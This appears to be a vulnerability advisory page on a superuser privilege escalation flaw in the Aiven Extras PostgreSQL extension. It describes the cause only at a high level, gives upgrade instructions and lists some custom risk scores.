Primary

Context

Aiven Extras PostgreSQL Extension Privilege Escalation Vulnerability

Vulnerability

A privilege escalation vulnerability has been identified in the Aiven Extras PostgreSQL extension, specifically in versions prior to 1.1.15. This vulnerability allows users to elevate their privileges to superuser within PostgreSQL databases that have the Aiven Extras package installed. The issue arises because the format function is not properly schema-prefixed, creating a loophole for privilege escalation.

Impact

Exploitation of this vulnerability allows for unauthorized elevation to superuser privileges in PostgreSQL databases using the Aiven Extras extension.

Remediation

Users are advised to upgrade to version 1.1.16 of the Aiven Extras PostgreSQL extension. After upgrading, it is necessary to run the command 'ALTER EXTENSION aiven_extras UPDATE TO '1.1.16'' in each database where Aiven Extras is installed.

Added: Jun 9, 2025, 7:46 PM

Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

7.5

exploitability

5.5

remediation

7.7

relevance

0.0

threat

3.2

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

7.5

exploitability

5.5

remediation

7.7

relevance

0.0

threat

3.2

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Aiven Extras PostgreSQL Extension Privilege Escalation Vulnerability

Vulnerability

Impact

Remediation

Affected Products

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating